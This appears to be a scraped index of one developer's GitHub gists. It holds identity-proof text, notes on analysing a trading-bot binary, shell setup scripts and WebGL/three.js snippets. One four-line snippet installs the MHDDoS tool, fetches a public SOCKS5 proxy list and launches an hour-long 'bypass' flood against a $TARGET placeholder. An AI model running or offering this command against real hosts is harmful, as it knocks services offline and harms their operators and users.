I hereby claim:
- I am mate-h on github.
- I am matehm (https://keybase.io/matehm) on keybase.
- I have a public key ASBDVIjhX6uqtBcEpV_IGqfuSwIflD7w0vG9cZlV_3kxRgo
To claim this, I am signing this object:
| Verifying my Blockstack ID is secured with the address 1KQQgQaGhEJ8t5G1MkQyR459ko7niFbTBm https://explorer.blockstack.org/address/1KQQgQaGhEJ8t5G1MkQyR459ko7niFbTBm |
I hereby claim:
To claim this, I am signing this object:
Obtained binaries from Discord server. The download link: https://drive.google.com/file/d/1xPP9R2VKmJ9jwNY_1xf1sVVHlxZIsLcg
Basic information about binaries. There are two main versions of the program in question:
aimful-kucoin.exe and aimful-binance.exe. They are both Windows executables. From the FAQ section of the discord server, the following information is available:
In what language was this bot written?
- Python.
| # install mise from https://mise.jdx.dev/getting-started.html | |
| mise install java@17 | |
| mise global java@17 | |
| # install brew from https://brew.sh/ | |
| # sdkmanager, avdmanager | |
| brew install --cask android-commandlinetools | |
| echo "fish_add_path /opt/homebrew/share/android-commandlinetools/cmdline-tools/latest/bin" > ~/.config/fish/config.fish |
| #extension GL_OES_standard_derivatives : enable | |
| precision highp float; | |
| uniform float u_time; | |
| uniform vec2 u_resolution; | |
| varying vec4 v_position; | |
| varying vec2 v_texcoord; |
| git clone https://github.com/MatrixTM/MHDDoS.git | |
| cd MHDDoS | |
| pip3 install -r requirements.txt | |
| wget https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt | |
| python start.py bypass $TARGET 5 101 socks5.txt 100 3600 |
| import proj4 from "proj4"; | |
| import * as THREE from "three"; | |
| // BC Albers | |
| proj4.defs( | |
| "EPSG:3005", | |
| "+proj=aea +lat_0=45 +lon_0=-126 +lat_1=50 +lat_2=58.5 +x_0=1000000 +y_0=0 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs +type=crs" | |
| ); | |
| // approximate radius of the earth in megameters (sphere) |
# download and run this script
# /bin/bash -c "$(curl -fsSL https://gist.githubusercontent.com/mate-h/c628c39f4953350fe6b2f1a044f97cda/raw/f45dca3e04f386529117c34481c5702a0ef623b5/env.sh)"
# shell script to set up new environment
# install chrome
wget https://dl.google.com/chrome/mac/stable/GGRO/googlechrome.dmg
# vscode at https://code.visualstudio.com/| import { useFrame } from '@react-three/fiber' | |
| import { MutableRefObject, useMemo, useRef } from 'react' | |
| import { | |
| BufferAttribute, | |
| BufferGeometry, | |
| FloatType, | |
| HalfFloatType, | |
| LinearFilter, | |
| Mesh, | |
| NearestFilter, |